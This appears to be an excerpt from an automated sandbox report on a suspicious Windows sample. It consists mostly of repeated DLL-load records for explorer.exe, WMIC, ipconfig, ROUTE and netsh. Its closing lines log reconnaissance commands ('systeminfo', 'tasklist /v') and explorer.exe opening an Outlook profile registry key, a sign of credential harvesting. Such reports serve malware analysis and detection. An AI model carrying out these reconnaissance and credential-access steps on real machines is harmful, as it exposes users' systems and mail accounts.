                  Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
                  Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                  Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                  Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                  Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                  Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                  Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                  Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                  Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                  Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
                  Source: C:\Windows\explorer.exeSection loaded: aepic.dll
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                  Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: propsys.dll
                  Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                  Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\explorer.exeSection loaded: wldp.dll
                  Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
                  Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
                  Source: C:\Windows\explorer.exeSection loaded: netutils.dll
                  Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                  Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\ROUTE.EXESection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\ROUTE.EXESection loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
                  Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
